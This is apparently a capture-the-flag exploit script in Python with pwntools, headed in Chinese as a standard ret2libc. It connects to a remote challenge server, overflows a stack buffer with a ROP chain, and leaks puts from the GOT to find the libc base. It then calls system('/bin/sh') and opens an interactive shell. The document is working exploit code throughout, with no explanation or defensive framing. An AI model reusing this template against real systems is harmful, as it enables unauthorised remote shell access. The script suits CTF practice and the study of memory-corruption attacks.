标准的 ret2libc
from pwn import *
from struct import pack
from ctypes import *
#from LibcSearcher import *
def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : return p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
def debug():
gdb.attach(p)
pause()
def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)
context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('43.143.7.127', 28969)
elf = ELF('./pwn')
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so')
libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc-2.31.so')
rdi = 0x401283
ret = 0x401219
sa(b'here~\n', b'a'*0x48 + p64(rdi) + p64(elf.got['puts']) + p64(elf.sym['puts']) + p64(elf.sym['main']))
libc_base = get_addr() - libc.sym['puts']
#gdb.attach(p, 'b *0x401219')
system, binsh = get_sb()
sa(b'here~\n', b'a'*0x48 + p64(ret) + p64(rdi) + p64(binsh) + p64(system))
inter()